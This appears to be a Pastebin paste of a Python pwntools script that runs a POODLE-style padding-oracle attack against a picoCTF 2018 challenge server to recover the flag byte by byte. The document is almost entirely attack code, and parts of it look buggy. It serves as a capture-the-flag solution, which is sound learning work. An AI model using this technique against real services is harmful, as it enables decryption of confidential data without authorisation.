SHARE
TWEET

Untitled

a guest Mar 24th, 2019 59 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. from pwn import *
  2. frontPadding = '.' * 43
  3. backPadding = '.' * 3
  4.  
  5. # implementation of the poodle attack
  6. def send(frontPadding, backPadding):
  7. # returns false and an empty array if unsuccessful, if unsuccessful, returns true and an array holding the char of interest
  8.     p = remote('2018shell1.picoctf.com', 14263)
  9.     p.recvuntil('(S)')
  10.     p.sendline('e')
  11.     p.recvuntil('report: ')
  12.     p.sendline(frontPadding)
  13.     p.recvuntil('else? ')
  14.     p.sendline(backPadding)
  15.     outputStr = p.recvuntil('(S)').split('\n')[0][11:] # getting the hex output
  16.     output = []
  17.     for i in range(0, len(outputStr) - 32, 32):
  18.         output.append(outputStr[i:i+32])
  19.     # we are interested in block 8 and its previous block, 7, remember first block is the randomized iv
  20.     interestBlock = output[8]
  21.     interestBlockPrev = output[7]
  22.     # also need second to last block for decryption if successful
  23.     interestBlockLast = output[13]
  24.     # replace padding block (block 14) with interestBlock
  25.     exploit = outputStr[0:448] + interestBlock
  26.     # sending in the probable exploit
  27.     p.sendline('s')
  28.     p.recvuntil('message: ')
  29.     p.sendline(exploit)
  30.     result = p.recvall()
  31.     p.close()
  32.     if 'Successful decryption' not in result:
  33.         return False, []
  34.     else:
  35.         return True, [(xor(xor(0x10, interestBlockLast[-1].decode('hex')), interestBlockPrev[-1].decode('hex'))]
  36.  
  37. #exploiting
  38. flag = ''
  39. result = False
  40. output = []
  41. # Exception catching
  42. repeat = True
  43. for i in range(29):
  44.     while repeat:
  45.         try:
  46.             result, output = send(frontPadding[i:], backPadding + '.' * i)
  47.             repeat = False
  48.             if result:
  49.                 print '\033[92mSUCCESS ON ONE CHARACTER\033[0m'
  50.                 print '\033[92m' + chr(output[0]) + '\033[0m'
  51.                 break
  52.             else:
  53.                 repeat = True
  54.         except Exception as e:
  55.             print 'Error... retrying'
  56.     output += chr(output[0])
  57.     print output
  58. print output
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top